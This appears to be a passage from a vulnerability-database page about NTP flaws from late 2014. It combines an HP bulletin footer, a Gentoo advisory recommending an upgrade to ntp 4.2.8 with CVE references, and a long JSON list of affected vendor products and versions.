Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-34
http://security.gentoo.org/
Severity: High Title: NTP: Multiple vulnerabilities Date: December 24, 2014 Bugs: #533076 ID: 201412-34
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could result in remote execution of arbitrary code. The net-misc/ntp package contains the official reference implementation by the NTP Project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8 >= 4.2.8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8"
References
[ 1 ] CVE-2014-9293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293 [ 2 ] CVE-2014-9294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294 [ 3 ] CVE-2014-9295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295 [ 4 ] CVE-2014-9296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-34.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201412-0614", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.7" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efficientip", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "omniti", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "watchguard", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.7p230" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-043) firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ne single model / cluster model ver.002.08.08 previous version" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "securebranch", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "version 3.2" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "ha8000 series", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "download server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.7" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux computenode optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux computenode", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.4.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.9.1" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.7.3" }, { "model": "network time protocol 4.2.7p10", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.7" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.6" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.5" }, { "model": "network time protocol 4.2.4p8@lennon-o-lpv", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol 4.2.4p7@copenhagen-o", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.4" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.2" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.1.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm server software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsm series appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r2-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2x51-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1x50-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.2x50-d70", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.2r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 11.4r12-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "xeon phi 7120p", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 7120a", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 5110p", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "xeon phi 3120a", "scope": null, "trust": 0.3, "vendor": "intel", "version": null }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.4" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.3" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.2" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "3.1" }, { "model": "manycore platform software stack", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "71005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "71005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "pureflex", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x6" }, { "model": "pureflex", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x6" }, { "model": "pureflex x240m5+pen", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureflex x240m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureflex x220m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.7.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "nextscale nx360m5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nextscale nx360m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.0" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "idataplex dx360m4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "rack v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "x8000" }, { "model": "v1300n v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tecal xh621 v100r001c00b010", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh320 v100r001c00spc105", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh311 v100r001c00spc100", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "tecal xh310 v100r001c00spc100", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh5885h v100r003c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r003c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "rh5885 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2485 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288h v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288e v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2288 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2285h v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh2285 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "rh1288 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "fusionsphere openstack v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c02spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncube v100r002c01spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vtm v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace vcn3000 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace usm v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v200r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace uc v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v200r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2980 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace ivs v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace dcm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c50", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c32", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cc v200r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace cad v100r001c01lhue01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight uc\u0026c v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dc v100r002c01spc001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.10" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.2" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1" }, { 